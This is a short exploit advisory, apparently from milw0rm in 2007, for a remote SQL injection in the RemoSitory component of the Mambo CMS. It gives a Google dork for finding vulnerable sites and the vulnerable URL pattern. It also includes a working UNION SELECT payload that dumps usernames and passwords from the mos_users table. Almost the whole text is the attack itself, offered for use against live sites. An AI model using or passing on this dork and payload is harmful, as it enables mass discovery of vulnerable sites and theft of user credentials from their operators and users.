*******************************************************************************
# Title : Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.remository.com/
# $$ : Free
# Dork : inurl:func=selectcat + com_remository // Result:43.400
# DorkEx : http://www.google.com.tr/search?q=inurl:func%3Dselectcat+%2B+com_remository&hl=tr&start=0&sa=N
*******************************************************************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]///index.php?option=com_remository&func=selectcat&cat=[SQL]
Example:
//index.php?option=com_remository&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-08-23]